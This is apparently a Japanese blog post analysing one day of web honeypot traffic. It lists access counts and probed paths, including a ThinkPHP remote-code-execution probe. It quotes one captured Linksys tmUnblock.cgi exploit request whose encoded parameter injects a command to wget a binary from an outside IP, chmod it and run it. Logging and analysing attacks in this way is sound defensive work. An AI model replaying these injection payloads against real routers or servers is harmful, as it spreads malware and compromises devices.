honeypotの簡易解析14日目

2019-04-14のアクセス数は68件でした。

■送信元IPアドレスの数は 54件です。

■メソッドの一覧と件数は以下です。

method総数
GET63
POST5
合計 結果68

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET53
//vtigercrm/vtigerservice.phpGET2
/acadmin.phpGET1
/admin-scripts.aspGET1
/favicon.icoGET2
/tmUnblock.cgiPOST2
/TP/public/index.phpGET2
/TP/public/index.php?s=captchaPOST2
/TP/public/index.php?s=index/\think\app/invokefunction&
function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
GET2
/users?page=&size=5POST1

気になるlog

-=-=41件目のlog=-=-

[2019-04-14 16:30:13+0900] 46.101.199.148 188.166.41.194:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False POST /tmUnblock.cgi HTTP/1.1
 Host: 188.166.41.194:80
 Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Accept: /
 User-Agent: python-requests/2.20.0
 Content-Length: 227
 Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F165.22.136.161%2Fvb%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

よくくるLinksysの脆弱性を突くやつです。http[:]//165.22.136.161/vb/mpsl にアクセスしても404が返ってきます。

常に404のためなのか、virustotalにも検体があがった実績はないです。

rm -rf mpsl で既存のmpslファイルを消して、ダウンロードさせた検体と置き換えています。

mpsl って何なんだろう・・mplsのタイポ?